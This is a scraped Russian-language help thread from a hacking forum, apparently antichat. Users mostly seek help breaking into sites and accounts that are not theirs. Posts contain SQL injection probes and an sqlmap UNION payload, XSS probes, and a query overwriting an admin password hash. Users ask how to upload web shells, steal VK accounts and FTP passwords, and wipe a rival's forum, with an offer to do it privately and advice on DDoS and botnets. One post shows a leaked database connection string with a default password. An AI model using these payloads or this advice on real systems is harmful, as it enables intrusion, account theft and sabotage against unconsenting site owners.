Phpmyadmin можно найти попробовать и залогинится с этими данным. Ну банальщина вроде попытки использовать эти данные для других сервисов. Ну и конечно скачивание конфигов и других потенциально полезных файлов, в том числе чтобы новые зацепки найти. Такое вот.


Спасибо. За phpmyadmin я как-то забыл, ну а с его помощью файлы php можно создать разве? Хотя не обязательно: тут уже можно пользователя создать с адм. правами, а дальше уже...

Другие файлы по ходу на ВП сайте ничего полезного не несут.

Но как вариант ещё на ФТП с теми же данными попробовать, как Вы посоветовали.


↑ (https://antichat.live/posts/3978726/)
Прошу прощения, что вмешиваюсь, а на мой вопрос кто-то может ответить, пожалуйста?


Мало данных от Вас. Судя по написанному - кавычки нет в запросе перед AND. Точно не знаю, но вроде там ещё надо ставить знак комментария /* в самом конце.

Дальше: может быть просто банально защита через .htaccess от "опасных" запросов. Поведение движка, если это движок такое.

Много чего может быть.

Vitam1n
28.04.2016, 20:39
↑ (https://antichat.live/posts/3978869/)
Мало данных от Вас. Судя по написанному - кавычки нет в запросе перед AND. Точно не знаю, но вроде там ещё надо ставить знак комментария /* в самом конце.
Дальше: может быть просто банально защита через .htaccess от "опасных" запросов. Поведение движка, если это движок такое.
Много чего может быть.


Понятно, большое спасибо. Хм... Мда, буду пробовать.

Vitam1n
28.04.2016, 22:36
Да, действительно, traan прав. Не было кавычки перед AND. Хотя дело оказалось в комментарии в самом конце.

Получается, что /index.php?pageid=451 AND 1=1 /* и /index.php?pageid=451' AND 1=1 /* выдают одинаковый результат. Если коммент убрать, то выдаст 403, а так пишет, что Incorrect url.

Интересно, получится ли что-то выжать...

traan, спасибо!

fqyeh29
29.04.2016, 09:55
Ребят, нашел на своем сайте уязвимость. В бд можно записать любую строчку, и потом в одном месте он выводит данные из бд не фильтруя. Т.е XSS есть(алерт пишется,выводится и срабатывает). Скоро исправлю.

Но меня больше интересует SQL инъекция. сейчас фильтруются все кавычки(комментируются обратным слешем, аж 4 шт, хз зачем)

пример пр вводе ' UNION SELECT 1:

purch='\\\\' UNION SELECT 1'

Этого достаточно чтоб не было инъекции?

Можно пример когда это не поможет? (надо )

PS двиг куплен у фрила.

Tafari
14.08.2016, 19:51
Коллеги, подскажите какой-нибудь сайт, аналогичное cve\.mitre\.org что бы там фиксировались все (ну или почти все) уязвимости на джумлу и друпал. Хотелось бы для мониторинга уязвимостей.

Спасибо!

ko0wy
18.08.2016, 02:09
↑ (https://antichat.live/posts/3981348/)
Коллеги, подскажите какой-нибудь сайт, аналогичное cve\.mitre\.org что бы там фиксировались все (ну или почти все) уязвимости на джумлу и друпал. Хотелось бы для мониторинга уязвимостей.
Спасибо!


https://vulners.com/ конечно же)

demafly76
20.08.2016, 17:32
"]
[XOR] said:
↑ (https://antichat.live/posts/3983274/)
Как всем этим можно воспользоваться? Я, конечно, читал про SQL Injection, и про XSS, и про Shell Injection. Но везде про это написано на столь начальном уровне, что применить эти знания в реальных условиях не получается


читать мало, нужно понимать сам процесс....

Namelimit
20.08.2016, 18:55
"]
[XOR] said:
↑ (https://antichat.live/posts/3983274/)
? Пробовал так
/index.php?app=blog&module=display§ion=blog&blogid=181&showentry=99'%20-->">'>'"alert()
и ничего не происходит. Помогите разобраться.


В любые формы ввода вставляй и жми на привязанную к ней кнопку, если имеется уязвимость, то получишь всплывающее окно.

Подробнее: /threads/20140/ (https://antichat.live/threads/20140/)

headWoW
25.08.2016, 13:53
Реально ли взломать сайт ВордПресс? Посоветуйте способы

Rem0teC0DE
25.08.2016, 17:47
Хэй гангстеры, никто не вкурсе как ВК проверяет архивы которые ты прикрепляешь? забавно то, что они не чекают .gz и можно накидывать исполняемые файлы черз такие архивы. А вот рар и запароленный рар они чекают на наличие исполняемых файлов. Складывается вопрос, как? смотрят заголовки? смотрел через бюрпсьют реквесты и респонсы, так вот в респонасх видно что там лежит исполняемый файл и выкидывает эррор

Drupa
26.08.2016, 03:45
Ребята помогите пожалуйста, вот темка про эксплойт на phpmyadmin

[ Обзор уязвимостей phpMyAdmin ] (https://antichat.live/threads/50669/page-2/)

не чего не пойму как ей пользоваться ?

прошу не кидайте в меня камни, просто скажите как это сделать

Sensoft
26.08.2016, 04:53
↑ (https://antichat.live/posts/3984849/)
Ребята помогите пожалуйста, вот темка про эксплойт на phpmyadmin
[ Обзор уязвимостей phpMyAdmin ] (https://antichat.live/threads/50669/page-2/)
не чего не пойму как ей пользоваться ?
прошу не кидайте в меня камни, просто скажите как это сделать


Найди другой эксплоит

Этот чёт и я не смог запустить

Drupa
26.08.2016, 09:56
↑ (https://antichat.live/posts/3984854/)
Найди другой эксплоит
Этот чёт и я не смог запустить


Я буду искать. Расскажи как ты его запускал и через что ? я просто вообще не пойму как подобным пользоваться.

powerOfthemind
30.08.2016, 12:20
↑ (https://antichat.live/posts/3984869/)
Я буду искать. Расскажи как ты его запускал и через что ? я просто вообще не пойму как подобным пользоваться.


Самое простое сделай пхп файл на другом шеле или локал сервере и запусти через браузер

kusbaz
05.09.2016, 02:58
Здравствуйте имеется файлы ipb 2/3/6 и база которое украли у меня и на новом адресе запустили форум но форум был запушен именно с теми файлами и с базой которые у меня есть моды все добавлял сам короче можно ли как то грохнуть тот форум который был запушен на новом адресе ? или может кто то взяться за работу ? заранее благодарен за ответ.

Sensoft
05.09.2016, 08:10
↑ (https://antichat.live/posts/3987935/)
Здравствуйте имеется файлы ipb 2/3/6 и база которое украли у меня и на новом адресе запустили форум но форум был запушен именно с теми файлами и с базой которые у меня есть моды все добавлял сам короче можно ли как то грохнуть тот форум который был запушен на новом адресе ? или может кто то взяться за работу ? заранее благодарен за ответ.


в скорей всего кто то использовал эксплоит, поставь патчи только с норм форумов бери а то на shell нарвёшься и опять же проверь свои, может и всё что ты кидал на сервак там может быть shell

kusbaz
05.09.2016, 21:33
есть кто вазмотся за работу за деньги ? так как я сам ни шарю в этом.

Sensoft
05.09.2016, 21:38
↑ (https://antichat.live/posts/3988181/)
есть кто вазмотся за работу за деньги ? так как я сам ни шарю в этом.


ради интереса сколько платишь ?

gordondalos
05.09.2016, 21:46
Кто-нибуть знает алгоритм программы dirbruster?. Поделитесь как она работает. Или хотябы сделайте свое предлоложение.

kusbaz
05.09.2016, 21:54
↑ (https://antichat.live/posts/3988186/)
ради интереса сколько платишь ?


500 руб.

pw0ned
05.09.2016, 22:27
↑ (https://antichat.live/posts/3987945/)
в скорей всего кто то использовал эксплоит, поставь патчи только с норм форумов бери а то на shell нарвёшься и опять же проверь свои, может и всё что ты кидал на сервак там может быть shell


Причём тут сплойт ?

Обычный его дамп загрузили к себе, вот и все.

Sensoft
05.09.2016, 22:34
↑ (https://antichat.live/posts/3988216/)
Причём тут сплойт ?
Обычный его дамп загрузили к себе, вот и все.


Фу бля я думал типа его форум хакнули и он хочет теперь защититься )

не так понял короче ну бывает

Sensoft
05.09.2016, 22:35
↑ (https://antichat.live/posts/3988195/)
500 руб.


Найди человека которы дудос может провести на 500 рублей мало и не надолго купи ботнет или что то типа того я в досе не силён

pw0ned
05.09.2016, 22:36
↑ (https://antichat.live/posts/3988195/)
500 руб.


Прости, но за такие деньги ты только в отхожее место сбегаешь )

pw0ned
05.09.2016, 22:52
↑ (https://antichat.live/posts/3988222/)
Найди человека которы дудос может провести на 500 рублей мало и не надолго купи ботнет или что то типа того я в досе не силён


За дудос минимальная цена стартует от 30$ в сутки (на не защищенный сайт), если он защищенный - следовательно и цена выше.

Ботнет за такие деньги он не купит, разве что с количеством в 1,2 бота.

kusbaz
05.09.2016, 23:18
понял спасибо всем ну вой форум не хакнули проста культурно все через хостер увели и открыли на новом адресе теперь я подумал может кто им на новый адрес бросить шел чтобы каждый раз после восстонавление через бекап форум я шлепал их через шел .

kusbaz
05.09.2016, 23:32
я могу заплатить нужную сумму но сгарантией что больше этот форум в интернете не появиться ото какой смысыл платить деньги и через час через бекап опять восстановят форум пиратский.

pw0ned
05.09.2016, 23:39
↑ (https://antichat.live/posts/3988252/)
я могу заплатить нужную сумму но сгарантией что больше этот форум в интернете не появиться ото какой смысыл платить деньги и через час через бекап опять восстановят форум пиратский.


Backup храняться на стороне хостера, его то не взломаешь.

kusbaz
05.09.2016, 23:58
↑ (https://antichat.live/posts/3988259/)
Backup храняться на стороне хостера, его то не взломаешь.


вот что мне нужно скажу по подробнее залить на форум шел и через шел удалять например темы они опять будут восстанавливать базу на один день раньше но они не будут менять файлы которые мы залили шел и опять через шел будем удалять что та им надоест все это и они сами сгинут.

pw0ned
06.09.2016, 00:00
↑ (https://antichat.live/posts/3988280/)
вот что мне нужно скажу по подробнее залить на форум шел и через шел удалять например темы они опять будут восстанавливать базу на один день раньше но они не будут менять файлы которые мы залили шел и опять через шел будем удалять что та им надоест все это и они сами сгинут.


Если у них бекап за тот момент когда шелл ещё не присутствовал, восстановление его удалит.

kusbaz
06.09.2016, 00:49
↑ (https://antichat.live/posts/3988281/)
Если у них бекап за тот момент когда шелл ещё не присутствовал, восстановление его удалит.


А шелл заливается в корень сайта или в базу сайта ? если в корень то они врятли догадаются если в базу то тут да вы правы, ну если шелл легко заливать на форум то нужно найти кто мне на учет грузить шелл на форум и каждый день буду сам грузить и лопать именно тот форум.

pw0ned
06.09.2016, 01:03
↑ (https://antichat.live/posts/3988315/)
А шелл заливается в корень сайта или в базу сайта ? если в корень то они врятли догадаются если в базу то тут да вы правы, ну если шелл легко заливать на форум то нужно найти кто мне на учет грузить шелл на форум и каждый день буду сам грузить и лопать именно тот форум.


В корень конечно. Ну а как им не догадаться, если ваша цель - убить форум.

kusbaz
06.09.2016, 01:56
можете научить заливку шелла на форум ? или можете сами сделать ? учителю без базара заплачу за учебу. Кто может на учить пишите в л/ч сообщение. Заранее благодарен. И всем спасибо за ответы. всех благ

BabaDook
06.09.2016, 02:28
Идите в другой раздел с такими предложениями. Тут вопросы и ответы на тему уязвимости.

Sensoft
06.09.2016, 10:27
↑ (https://antichat.live/posts/3988337/)
можете научить заливку шелла на форум ? или можете сами сделать ? учителю без базара заплачу за учебу. Кто может на учить пишите в л/ч сообщение. Заранее благодарен. И всем спасибо за ответы. всех благ


Кинь в личку адрес форума

Johnydriver
06.09.2016, 18:56
Как угнать домены в зоне .com

например в зоне ру как через стил домен, но нужно в зоне .com

pw0ned
06.09.2016, 19:49
↑ (https://antichat.live/posts/3988601/)
Как угнать домены в зоне .com
например в зоне ру как через стил домен, но нужно в зоне .com


Как вариант палить домены без ДНСа под хост который нужен.

Donyan
06.09.2016, 20:43
Друзья, есть слепая скуля, time-based, у юзера есть привилегии: file, insert,update,delete,create,drop etc... Что можно сделать? Я так понимаю, т.к есть привилегия file,то есть возможность залить шел? Кто-то поможет осуществить?

BabaDook
06.09.2016, 21:43
↑ (https://antichat.live/posts/3988657/)
Друзья, есть слепая скуля, time-based, у юзера есть привилегии: file, insert,update,delete,create,drop etc... Что можно сделать? Я так понимаю, т.к есть привилегия file,то есть возможность залить шел? Кто-то поможет осуществить?


Можете Писать,удалять, изменять данные в ДБ, так же работать с файлами.

Donyan
06.09.2016, 23:31
↑ (https://antichat.live/posts/3988710/)
Можете Писать,удалять, изменять данные в ДБ, так же работать с файлами.


Это я понимаю, но вот найти директорию под залив не получается )

Sensoft
06.09.2016, 23:34
↑ (https://antichat.live/posts/3988775/)
Это я понимаю, но вот найти директорию под залив не получается )


SQLmap попробуй

Donyan
06.09.2016, 23:37
↑ (https://antichat.live/posts/3988778/)
SQLmap попробуй


Пытаюсь прочитать /etc/passwd, начинает показывать что-то в хексе. => Существует путь /etc/passwd, но куда заливать то? )

Johnydriver
06.09.2016, 23:48
↑ (https://antichat.live/posts/3988629/)
Как вариант палить домены без ДНСа под хост который нужен.


ну вроде стил домен так-же работал.

А как это можно сделать, я бы написал шаб для зенки, то как чекать не знаю

BabaDook
06.09.2016, 23:49
↑ (https://antichat.live/posts/3988775/)
Это я понимаю, но вот найти директорию под залив не получается )


phpinfo, config, ошибки различные. стандарные пути

Donyan
07.09.2016, 02:04
↑ (https://antichat.live/posts/3988789/)
phpinfo, config, ошибки различные. стандарные пути


Можешь помочь/попробовать залить, дам вектор под хайд, а то вечер сижу, и без результатов )

Или другие желающие найдутся? )

kusbaz
07.09.2016, 21:40
↑ (https://antichat.live/posts/3988367/)
Кинь в личку адрес форума


скинул

labanec
10.09.2016, 14:02
Не подскажете, как заглянуть внутрь нагрузки? К примеру тут 0x7176787671 похоже на шеснадцатиричный код, но декодировать в текст не могу. Нагрузка сгенерирована при помощи sqlmap.

id=242' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717678 7671,0x7775534e73797142664f636876556e7774774d7a616 b73746d567763725754774a715966786d5642,0x716a6b6a71 ),NULL-- pKKs

BabaDook
10.09.2016, 19:33
Hex to string


↑ (https://antichat.live/posts/3989903/)
Не подскажете, как заглянуть внутрь нагрузки? К примеру тут 0x7176787671 похоже на шеснадцатиричный код, но декодировать в текст не могу. Нагрузка сгенерирована при помощи sqlmap.
id=242' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717678 7671,0x7775534e73797142664f636876556e7774774d7a616 b73746d567763725754774a715966786d5642,0x716a6b6a71 ),NULL-- pKKs

labanec
10.09.2016, 20:09
Пробовал, но вразумительного текста не увидел. Так и не понял, что же sqlmap в инекции скармливает базе. К примеру самый длинный хекс из приведенного мною запроса при конверсии выдает wuSNsyqBfOchvUnwtwMzakstmVwcrWTwJqYfxmVB

BabaDook
10.09.2016, 20:19
↑ (https://antichat.live/posts/3989990/)
Пробовал, но вразумительного текста не увидел. Так и не понял, что же sqlmap в инекции скармливает базе. К примеру самый длинный хекс из приведенного мною запроса при конверсии выдает wuSNsyqBfOchvUnwtwMzakstmVwcrWTwJqYfxmVB


И что? Что по вашему должно было быть? Если я блядь сказал hex, значит так оно есть и не*** ебать мозг другим своими блядскими догадками и предположениями. Уяснили все ?

labanec
10.09.2016, 20:28
Да ладно. Не надо так бурно реагировать.

rico
12.09.2016, 23:34
строка ?search=" вызывает DatabaseException на сайте, как можно развить иньекцию?

?search="+and+1="1успешно отрабатывает.

если пишу ?search="+#, ?search="+--, ?search="+/* - не помогает, создается впечатление что комментарии не работают...


update. Еще такая фича проходит "+and+(SELECT+"test")+or+1="1

Подскажите пожалуйста

ufagatezakaz
18.09.2016, 11:15
залил шелл, помогите найти путь до шелла, за $$$

powerOfthemind
24.09.2016, 00:39
↑ (https://antichat.live/posts/3992708/)
залил шелл, помогите найти путь до шелла, за $$$


Откуда такая увереность тогда что он залился? Если ты путь найти не можеш. Какой движок стоит ?

Vasiliy37
25.09.2016, 16:37
как взломать пользователя вк?

winstrool
26.09.2016, 00:26
↑ (https://antichat.live/posts/3995052/)
как взломать пользователя вк?


Впарить ему троян, фейк, отснифать его вайфай если он его юзает, e.t.c...

powerOfthemind
27.09.2016, 00:11
↑ (https://antichat.live/posts/3995218/)
Впарить ему троян, фейк, отснифать его вайфай если он его юзает, e.t.c...


С Wi-fi канает ещё ? https разве не шифруте трафик?

CyberTro1n
27.09.2016, 19:26
http://black-d.biz на чем дерьмо держится? причем там iklad-chat.biz

chat.iklad-chat.biz ?

bereznev
27.09.2016, 23:56
Как залить шелл на лендинг? Есть ли мануал или полезные ссылки для первых шагов в этом направлении?

Sensoft
28.09.2016, 13:54
↑ (https://antichat.live/posts/3995994/)
Как залить шелл на лендинг? Есть ли мануал или полезные ссылки для первых шагов в этом направлении?


получи доступ к ftp и делай что хочешь

bereznev
28.09.2016, 20:55
↑ (https://antichat.live/posts/3996172/)
получи доступ к ftp и делай что хочешь


Доступ к фтп можно получить только снифером или загнать стилер паролей на компьютер жертвы? Или ещё есть варианты?

Есть смысл прогревать сапорт хостера, чтобы слили пароль от фтп?

CyberTro1n
28.09.2016, 21:45
↑ (https://antichat.live/posts/3996325/)
Есть смысл прогревать сапорт хостера, чтобы слили пароль от фтп?


Забавно) всегда как вар.

Camelot495
28.09.2016, 22:46
Как задать вопрос?

pw0ned
28.09.2016, 22:47
↑ (https://antichat.live/posts/3996358/)
Как задать вопрос?


Вот так

Camelot495
28.09.2016, 22:52
Скажите пожалуйста. Возможно ли узнать пин код wps имея пароль от точки доступа?

На точках доступа включен wps. Реавер ни как не может подобрать пин для этих точек. Пришлось хватать handshake. И брутить, брутить.

BabaDook
28.09.2016, 23:01
↑ (https://antichat.live/posts/3996366/)
Скажите пожалуйста Возможно ли узнать пин код wps имея пароль от точки доступа?
На точках доступа включенwps. Ривер не может подобрать пин для этих точек пришлось хватать handshaking брутить.


Можно, но надо ещё доступ к самому ротуеру получить.

Camelot495
29.09.2016, 09:05
↑ (https://antichat.live/posts/3996367/)
Можно, но надо ещё доступ к самому ротуеру получить.


То есть пин прячется где-то в настройках роутера. А скажите какой путь к этому восьмизначному числу. Направление. Или это зависит от модели роутера.!? А то знаете как бывает - сменят пароль и начинай все сначала.

P.s. А авторизация у маршрутизаторов - по дефолту ))

Camelot495
29.09.2016, 18:47
Zuxel Keenetic 4G III : Пин код посмотрел в настройках роутера - Система->Файлы->self-test

(52127441)

hasp
06.10.2016, 20:04
Подскажите начинающему: можно ли с помощью sql инъекций получить валидные пары логин/пароль с таких сайтов, например как этот: _https://ovuepks.centertelecom.ru ? Или для этого применяются какие-то другие методы? М.быть какой-то перебор?

BabaDook
06.10.2016, 20:28
↑ (https://antichat.live/posts/3999045/)
Подскажите начинающему: можно ли с помощью sql инъекций получить валидные пары логин/пароль с таких сайтов, например как этот: _
https://ovuepks.centertelecom.ru
? Или для этого применяются какие-то другие методы? М.быть какой-то перебор?


Сложный вопрос , однако я отвечу что можно. И с помощью sql инъекций получить валидные пары логин/пароль и других не меньше известных уязвимостей. Так же хочу обратить внимание что это стечение обстоятельств, так же стоит не забывать другие очень важные факторы. Как говорил Чингачгук, всё в наших копьях.

Sensoft
06.10.2016, 23:03
↑ (https://antichat.live/posts/3999045/)
Подскажите начинающему: можно ли с помощью sql инъекций получить валидные пары логин/пароль с таких сайтов, например как этот: _
https://ovuepks.centertelecom.ru
? Или для этого применяются какие-то другие методы? М.быть какой-то перебор?


Чувак через sql injection ты как бы взломаешь базу данных сайта, а там представляешь вся инфа о пользователях есть

Sensoft
06.10.2016, 23:05
PHP 5.6.9 Use-After-Free Он есть в Metasploit Pro 4.12.0 ?

Я искал в модулях но когда ввожу название там стони совсем других эксплоитов появляются

Так ну тут тема называется "Задай Вопрос - Получи Ответ" щас посмотрим как я ответ получу )

BabaDook
07.10.2016, 00:27
↑ (https://antichat.live/posts/3999127/)
PHP 5.6.9 Use-After-Free Он есть в Metasploit Pro 4.12.0 ?
Я искал в модулях но когда ввожу название там стони совсем других эксплоитов появляются
Так ну тут тема называется "Задай Вопрос - Получи Ответ" щас посмотрим как я ответ получу )


Советую вам сашка создать отдельную тему в песочнице и апать чаще.Так же прошу заметить, ответ вы получили довольно оперативно и дельный, оба этих фактора играют важную роль на форуме и в мире в целом.

hiderat
09.10.2016, 12:43
А есть софт который сам ищет sql injection на asp сайте?

sinfo
09.10.2016, 12:47
↑ (https://antichat.live/posts/3999862/)
А есть софт который сам ищет sql injection на asp сайте?


Acunetix

hiderat
09.10.2016, 13:28
Если на сайте открыта папка можно на неё залить свою страничку\скрипт? С помощью чего?

pw0ned
09.10.2016, 14:15
↑ (https://antichat.live/posts/3999874/)
Если на сайте открыта папка можно на неё залить свою страничку\скрипт? С помощью чего?


Права на запись есть ?

ChocolatePuma
09.10.2016, 14:43
Нашел XSS, (постоянно вставляю ">TESTCSS)

Но если вставить: ">alert(document.cookie);

Результат: [removed]alert([removed]);[removed]"/>

Как обойти?

ChocolatePuma
09.10.2016, 14:52
Так тоже не выходит:

Фильтрует слово "javascript", получается:

hiderat
09.10.2016, 18:04
↑ (https://antichat.live/posts/3999889/)
Права на запись есть ?


Как проверить? Папка через браузер открывается и в ней список файлов

hiderat
12.10.2016, 22:10
Такой ещё вопросик-

На фтп есть 2 учетки. Одна моя, вторая соседа.

Можно как то вытянуть пароль от учетки соседа?

Брут и паяльник не предлогать)))

bustudo
13.10.2016, 08:11
Добрый день, есть база логинов пользователей, необходимо провести брутфорс, но на сайте капча, можно ли брутить в полуавтоматическом режиме(т.е когда необходимо ввести капчу это буду делать я)

p8araDISE5
14.10.2016, 17:41
Есть xss на сайте,помогите новичку написать код для изменения параметров http://itmages.ru/image/view/5026739/56b906a8

p8araDISE5
14.10.2016, 18:07
Сильно нуждаюсь в вашей помощи,может кто литературой поделится по HTML и JS

CyberTro1n
14.10.2016, 22:24
Kакие еще есть способы обхода CloudFlareдля обнаружения реального ипа помимо инструментов Nmap, Dig, nslookup и


http://www.crimeflare.com/cfs.html

? (https://www.google.ru/search?newwindow=1&q=CloudFlare&spell=1&sa=X&ved=0ahUKEwjKwuKK9drPAhVsIpoKHbPWCPcQvwUIGygA)

fox777xxx
17.10.2016, 22:55
господа,доброго времени суток. суть такова - образования профильного не имею,имею некоторую информацию о актуальных темных схемах в сети,имею некоторый опыт сотрудничества,но давно мечтаю все делать сам и пробраться в недры искусства. не хотелось бы тратить время на воду и ее изучение,интересуют прикладные материалы:статьи,мануалы,в зможно видео,софт, как говорится кто чем может. Буду рад любой помощи. Если будут желающие стать наставниками ,менторами дабы поделиться опытом- буду признателен.

более детально интерес описать не могу- могут забанить.

если коротенько-интересует ботнет, трояны под ios и android, ну и подобные вещи.

не судите строго,просто тяга бешеная к этому ремеслу с малых лет,а возможностей не было.

Camelot495
23.10.2016, 20:20
Здравствуйте. Помогите определиться с выбором wi-fi адаптера для пентестов на kali-rolling-2016-2-release! Сейчас пользуюсь awus036h.

(Неделю назад купил awus051nh версия 2 - для Windows работает хорошо. В Кали Linux тоже работает да вот только WPS reaver не подбирает.... и хендшейк не хочет ловить кстати он вообще не видит station. ....... ) (Доп. драйвера не ставил, патчи не применял.)

Посоветуйте внешний, универсальный и перспективный wi-fi адаптер для kali без танцев с бубеном!

hiderat
30.10.2016, 10:56
Есть сайт на который заливаются файлы. Как узнать папку куда они заливаются?

http://printing-servicesinc.com/Upload_Files.asp

ilia455
26.11.2016, 10:33
↑ (https://antichat.live/posts/3999901/)
Так тоже не выходит:

Фильтрует слово "javascript", получается:



Попробуй вот это /threads/13949/ (https://antichat.live/threads/13949/)

Octavian
09.12.2016, 18:54
http://www.bri.gov.md/logs/bri.gov.md.access.log

Есть лог как провести пхп инекцыю?

likepro
11.01.2017, 12:02
Atilekt.CMS кто знает где почитать про уязвимости данной cms или с кем пообщаться?

winstrool
11.01.2017, 12:08
↑ (https://antichat.live/posts/4034902/)
Atilekt.CMS кто знает где почитать про уязвимости данной cms или с кем пообщаться?


Качаешь исходники, изучаешь код, ищешь уязвимые моменты, тестируешь!

Nikolaz
13.01.2017, 13:10
Если не получается найти pma , но доступ к бд имеется, есть ли какой то вариант приконектится к бд?

t0ma5
13.01.2017, 14:04
↑ (https://antichat.live/posts/4035509/)
Если не получается найти pma , но доступ к бд имеется, есть ли какой то вариант приконектится к бд?


если доступ разрешен только с localhost, то можно найти соседние площадки на этом сервере, получить доступ к одной из них - загрузить pma

Nikolaz
13.01.2017, 14:47
↑ (https://antichat.live/posts/4035530/)
если доступ разрешен только с localhost, то можно найти соседние площадки на этом сервере, получить доступ к одной из них - загрузить pma


Ну, не... Соседи точно не вариант.

BabaDook
13.01.2017, 15:16
↑ (https://antichat.live/posts/4035509/)
Если не получается найти pma , но доступ к бд имеется, есть ли какой то вариант приконектится к бд?


Так у тебя доступ к БД есть, где проблема ?

t0ma5
13.01.2017, 15:25
↑ (https://antichat.live/posts/4035552/)
Ну, не... Соседи точно не вариант.


почему не вариант?


↑ (https://antichat.live/posts/4035576/)
Так у тебя доступ к БД есть, где проблема ?


если правильно понял, под доступом он подразумевает логин/пароль

winstrool
13.01.2017, 15:27
на соседних площадках имеет смысл поискать pma или его аналоги

P.S: к примеру берем ип домена и собираем список всех соседей, потом по списку начинаем сканить файликом возможных путей и названий

bencann
26.01.2017, 01:20
Всем шалом!

Как наверное многие, задался вопросом о взломе страниц пользователей соц сетей ВК и ОК, не корысти ради, а ради увеличения базы знаний и возможностей.

Способы с перехватом трафика работают отлично, но при условии нахождения с одной сети с юзером странички, здесь все просто и понятно.

А теперь вопрос! Возможно ли взломать страничку ВК или ОК зная, например, логин или id юзера?Или все это полный бред?

Господа, давайте раскроем эту животрепещущую для многих тему! Если возможно - пишем актуальные способы! Если это не возможно, или сверх сложно, то так и говорим! И пусть все живут спокойно)

Надеюсь, что остались те люди, кому небезразличны принципы свободы и гласности в сети, ну Вы поняли о чем я)))

Да прибудет с Вами Сила!)

sysjuk
27.01.2017, 16:25
[CODE]

pastword
27.02.2017, 09:34
на сайта есть поисковик с ХСС(input), значение принимает мин = 3, макс = 30 если написать 123'union select user()'-- выводится ошибка:

The used SELECT statements have a different number of columns

вопрос: как обойти ограничение в длине ввода запроса

[aywo]
27.02.2017, 10:30
↑ (https://antichat.live/posts/4053701/)
как обойти ограничение в длине ввода запроса


моя твоя не понимать....

тебе же написали НЕВЕРНОЕ КОЛИЧЕСТВО СТОЛБЦОВ. Какую длину и куда вводить ты её собрался? уж по таким простым инъектам тысячи статей написано

pastword
27.02.2017, 11:18
"]
[aywo] said:
↑ (https://antichat.live/posts/4053718/)
моя твоя не понимать....
тебе же написали НЕВЕРНОЕ КОЛИЧЕСТВО СТОЛБЦОВ. Какую длину и куда вводить ты её собрался? уж по таким простым инъектам тысячи статей написано


привет! дело в том что количество столбцов я выяснил их 7 но чтобы получить информацию из infomation_schema приходится написать запрос который содержит более 30 символа, а в input-е ограничение. Нельзя ли как то обойти эту грань?

Octavian
27.02.2017, 13:47
↑ (https://antichat.live/posts/4053736/)
привет! дело в том что количество столбцов я выяснил их 7 но чтобы получить информацию из infomation_schema приходится написать запрос который содержит более 30 символа, а в input-е ограничение. Нельзя ли как то обойти эту грань?


Это делается легко просто нужно поймать POST запрос.Любои програмои

1 HackBar :: Дополнения Firefox (https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwiB_qWh_q_SAhUPS5oKHVhZBDQQFggcMAA&url=https%3A%2F%2Faddons.mozilla.org%2Fru%2Ffirefo x%2Faddon%2Fhackbar%2F&usg=AFQjCNFy3KPgI2IoNcxUOE_8SHTcJdjMrw&sig2=jGrG76oRZEqoXqVQeKxEAA&bvm=bv.148073327,d.bGg)

2 Burp Suite

3 Charles

4 Live HTTP Headers :: Дополнения Firefox (https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwiU8vXU_q_SAhVIDiwKHVhyANkQFggcMAA&url=https%3A%2F%2Faddons.mozilla.org%2Fru%2Ffirefo x%2Faddon%2Flive-http-headers%2F&usg=AFQjCNGqzx5qAELEaHjU1OahT46Ja0bcZg&sig2=llnPyl7ds4ga3V0BErjNmw&bvm=bv.148073327,d.bGg)

kika21
22.03.2017, 12:58
Ногами не пинать)

Есть три БД например:

1111

2222

3333

Например в БД 1111 присутствует таблица 'admin' с полями:

555:

-id

-pass

-username

666

777

Как мне заменить значение поля (например 'pass') в таблице 555 (БД 1111) одним запросом?

ТОесть, не писать пару запросов:

USE 1111 ;

а потом

UPDATE 1111 SET pass='3ca8600e6e503543e651b8f3f2a511cf' where id=1

SooLFaa
24.03.2017, 20:42
↑ (https://antichat.live/posts/4063714/)
Ногами не пинать)
Есть три БД например:
1111
2222
3333
Например в БД 1111 присутствует таблица 'admin' с полями:
555:
-id
-pass
-username
666
777
Как мне заменить значение поля (например 'pass') в таблице 555 (БД 1111) одним запросом?
ТОесть, не писать пару запросов:
USE 1111 ;
а потом
UPDATE 1111 SET pass='3ca8600e6e503543e651b8f3f2a511cf' where id=1


UPDATE [ИМЯ СХЕМЫ].[ИМЯ БАЗЫ].[ИМЯ ТАБЛИЦЫ] SET pass='3ca8600e6e503543e651b8f3f2a511cf' where id=1

Просто полное имя таблиц указываешь с именем базы.

pastword
25.03.2017, 12:47
что нужно для того чтобы внести изминения в базу через sql-inject

Waspick
28.03.2017, 17:41
Какие уязвимости есть в phpmyadmin 3.4.11.1 ? Версия не самая новая но именно по ней ни инфы ни эксплоитов не нашел

gugu
07.04.2017, 18:41
Добрый день,я начинающий юзверь).Подскажите с чего начинать изучение веб-уязвимостей,или мне следует выучить для начала язык программирования(почему то охото с ассемблера начать)?Посоветуйте литературу и программы пожалуйста)

t0ma5
07.04.2017, 19:01
↑ (https://antichat.live/posts/4069764/)
Добрый день,я начинающий юзверь).Подскажите с чего начинать изучение веб-уязвимостей,или мне следует выучить для начала язык программирования(почему то охото с ассемблера начать)?Посоветуйте литературу и программы пожалуйста)


с желания разбираться, точки отсчета там нету, инфы кругом полно

cat1vo
07.04.2017, 19:18
↑ (https://antichat.live/posts/4069764/)
Добрый день,я начинающий юзверь).Подскажите с чего начинать изучение веб-уязвимостей,или мне следует выучить для начала язык программирования(почему то охото с ассемблера начать)?Посоветуйте литературу и программы пожалуйста)


Для начала начни с этого, все подробно и по порядку расписано.

https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

gugu
11.04.2017, 18:59
приветствую всех) подскажите на что я набрёл

[DATABASE]

C1=Provider=LCPI.IBProvider;data source=(здесь IP) :C:\WCDATA\Main\WC.GDB;ctype=win1251;user id=sysdba;auto_commit=true;password=masterkey

это я в локалке рабочей сервак нашёл и там строка в некоторых папках

искал хоть какие то пароли что бы кэрио выкл =(

gugu
12.04.2017, 19:08
приветствую) подскажите на что я набрёл,от чего может быль этот пароль?

[DATABASE]

C1=Provider=LCPI.IBProvider;data source=(здесь IP) :C:\WCDATA\Main\WC.GDB;ctype=win1251;user id=sysdba;auto_commit=true;password=masterkey

это я в локалке рабочей сервак нашёл и там строка в некоторых папках

